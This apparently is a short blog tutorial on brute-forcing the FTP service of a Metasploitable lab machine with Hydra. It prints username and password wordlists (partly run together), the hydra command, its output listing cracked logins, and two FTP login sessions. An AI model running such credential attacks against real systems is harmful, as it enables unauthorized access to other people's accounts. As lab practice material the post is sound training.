In this post, we will use Hydra to crack ftp password on our Metasploitable machine.

First we need to create 2 file on our Kali machine.
1 file containing a list of possible usernames and another file containing a list of possible passwords.
This is essentially a dictionary attack.
We used following for usernames and passwords file.

usernames.txtpasswords.txt
administrator
Administrator
admin
username
default
password
root
Admin
Password
Username
Root
Demo
ftp
Ftp		dmin
ftp
Username
pass
demo
Pass
Root
passwords
password
Password
Login
Admin
Administrator
Demo

Running the following command reads the usersnames.txt and the passwords.txt file and tries to logon to our metasploitable machine over ftp.

$ hydra -L usernames.txt -P passwords.txt 192.168.1.111 ftp

$ hydra -L usernames.txt -P passwords.txt 192.168.1.111 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-31 19:42:04
[DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:14/p:14), ~13 tries per task
[DATA] attacking ftp://192.168.1.111:21/
[21][ftp] host: 192.168.1.111   login: ftp   password: dmin
[21][ftp] host: 192.168.1.111   login: ftp   password: Username
[21][ftp] host: 192.168.1.111   login: ftp   password: Root
[21][ftp] host: 192.168.1.111   login: ftp   password: pass
[21][ftp] host: 192.168.1.111   login: ftp   password: ftp
[21][ftp] host: 192.168.1.111   login: ftp   password: Pass
[21][ftp] host: 192.168.1.111   login: ftp   password: demo
[21][ftp] host: 192.168.1.111   login: ftp   password: passwords
[21][ftp] host: 192.168.1.111   login: Ftp   password: dmin
[21][ftp] host: 192.168.1.111   login: Ftp   password: pass
[21][ftp] host: 192.168.1.111   login: Ftp   password: ftp
[21][ftp] host: 192.168.1.111   login: Ftp   password: Username
[21][ftp] host: 192.168.1.111   login: Ftp   password: demo
[21][ftp] host: 192.168.1.111   login: Ftp   password: Pass
[21][ftp] host: 192.168.1.111   login: Ftp   password: Root
[21][ftp] host: 192.168.1.111   login: Ftp   password: passwords
1 of 1 target successfully completed, 16 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-31 19:42:41

Hydra was able to find 16 valid passwords. Next we will try to logon to metasploitable over ftp with the tested passwords.

──(test㉿kali)-[~/Desktop]
└─$ ftp 192.168.1.111 
Connected to 192.168.1.111.
220 (vsFTPd 2.3.4)
Name (192.168.1.111:test): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> exit
221 Goodbye.
                                                                                                                                                                                                                                           
┌──(test㉿kali)-[~/Desktop]
└─$ ftp 192.168.1.111
Connected to 192.168.1.111.
220 (vsFTPd 2.3.4)
Name (192.168.1.111:test): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> exit
221 Goodbye.